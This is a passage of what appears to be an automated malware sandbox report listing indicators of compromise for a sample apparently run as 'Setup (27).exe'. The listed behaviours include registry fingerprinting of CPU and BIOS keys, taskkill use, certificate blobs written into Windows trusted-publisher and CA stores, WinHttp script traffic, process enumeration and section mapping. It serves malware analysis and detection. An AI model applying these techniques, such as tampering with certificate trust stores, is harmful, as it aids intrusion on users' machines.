\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 _uTsQfTNLHJzGiTq5uM9a45f.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier _uTsQfTNLHJzGiTq5uM9a45f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 _uTsQfTNLHJzGiTq5uM9a45f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision _uTsQfTNLHJzGiTq5uM9a45f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 32 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS _uTsQfTNLHJzGiTq5uM9a45f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU _uTsQfTNLHJzGiTq5uM9a45f.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 1736 taskkill.exe 3384 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6924 PING.EXE -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 100 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 103 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 128 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 130 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 132 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 238 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 244 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4992 Setup (27).exe 4992 Setup (27).exe 4964 WerFault.exe 4964 WerFault.exe 4832 BMG_GmhfPGrt3H8Z7HF1KdFS.exe 4832 BMG_GmhfPGrt3H8Z7HF1KdFS.exe 3068 _uTsQfTNLHJzGiTq5uM9a45f.exe 3068 _uTsQfTNLHJzGiTq5uM9a45f.exe 4920 WerFault.exe 4920 WerFault.exe 400 WerFault.exe 400 WerFault.exe 4016 Process not Found 4016 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 560 WerFault.exe 560 WerFault.exe 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found 3100 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3100 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4832 BMG_GmhfPGrt3H8Z7HF1KdFS.exe 7008 _uTsQfTNLHJzGiTq5uM9a45f.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
